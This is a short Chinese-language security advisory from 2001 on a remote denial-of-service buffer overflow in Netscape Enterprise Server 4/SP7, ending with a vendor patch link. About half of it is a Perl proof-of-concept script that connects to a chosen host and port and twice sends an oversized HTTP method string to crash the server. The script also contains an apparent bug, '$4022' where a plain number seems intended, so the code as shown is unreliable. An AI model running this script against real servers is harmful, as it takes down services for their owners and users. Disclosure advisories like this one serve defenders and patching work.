Netscape Enterprise Server 4 Method和URI存在缓冲溢出发布时间:2001-05-22 更新时间:2001-05-22 严重程度:中 威胁程度:远程拒绝服务 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Netscape Enterprise Server 4/SP7详细描述 通过对Netscape Enterprise Server发送不合法的method或者4022 字节的URI,可以导致服务停止响应。 测试代码 ---------------------------------------------------------------------------- ---------- #!/usr/bin/perl use IO::Socket; if (@ARGV < 2) { print "Usage: host port\n"; exit; } $overflow = "A" x $4022; &connect; sleep(15); &connect; exit; ################################################ sub connect() { $sock= IO::Socket::INET->new(Proto=>"TCP", PeerAddr=>$ARGV[0], PeerPort=>"$ARGV[1]",) or die "Cant connect to $ARGV[0]: $!\n"; $sock->autoflush(1); print $sock "$overflow /index.html HTTP/1.0\n\n"; $response=<$sock>; print "$response"; while(<$sock>){ print "$_\n"; } close $sock; } 解决方案 使用NSAPI补丁: http://www.iplanet.com/products/iplanet_web_enterprise/iwsalert5.11.html. 相关信息 |
